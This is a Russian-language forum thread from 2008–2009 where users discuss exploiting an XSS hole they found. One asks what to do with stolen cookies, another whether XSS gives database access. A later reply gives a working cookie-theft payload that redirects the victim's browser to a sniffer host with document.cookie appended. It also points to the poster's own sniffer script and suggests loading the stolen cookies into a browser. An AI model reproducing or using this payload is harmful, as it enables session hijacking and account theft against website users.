XSS JavaScript Кукисы

z5kRS

Guest

Это нравится:0 Да/0 Нет

20.10.2008 22:39:29

Нашел уязвимость. Через XSS можно сунуть любой скрипт, ткаим образом достал кукисы, но что с ними сделать??? Если можно, еще один вопрос, можно-ли на JS написать код фтп-сервера прям на странице? Если можно,то как?Плиз. помогите

ZER0

Guest

Это нравится:0 Да/0 Нет

21.10.2008 20:56:19

Цитата

прочел дважды. так и не понел что вы хотите

а cookies надо есть

Изменено: ZER0 - 21.10.2008 20:56:29

Phoenix

Guest

Это нравится:0 Да/0 Нет

24.10.2008 14:18:40

FTP сервер написать прямо на странице методами JS нельзя.
Но например при помощи JS можно подгрузить актив икс объект, который может выполнять функции FTP сервера.
Конечно же пользователь должен разрешить выполнение этого актив икс объекта

Dark Angel Guest	#4 Это нравится:0 Да/0 Нет 27.10.2008 22:37:27 а через XSS можно доступ к БД сайта как нибудь получить?

Stierus Guest	#5 Это нравится:0 Да/0 Нет 27.10.2008 23:09:32

FixET Guest	#6 Это нравится:0 Да/0 Нет 27.10.2008 23:16:35 Изменено: FixET - 27.10.2008 23:16:53

qwyzqwyz qwyzqw

Guest

Это нравится:0 Да/0 Нет

18.02.2009 16:16:19

vobshem,esli ty ugonyaesh kuki,to ispolzui:
1)javascript
//cherez nego posylaesh po location.href + cookie zhertvu i vse: primer:
"><script>location.href="http://sniffer.com"+escape(document.cookie)</script>
2)sniffer
vot moi poprobui,sam kodil (cookie v parametre "cookie",redirekt [kuda zhertva potom poidet] v parametre "to",zashifrovannom base64 [shifrator tozhe prilagaetsa]:
http://www.securitylab.ru/forum/forum20/topic47938/messages/
3)operu
chtoby vstavit nagrablennoe
udachi.

ZER0 Guest	#8 Это нравится:0 Да/0 Нет 25.02.2009 10:52:35

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?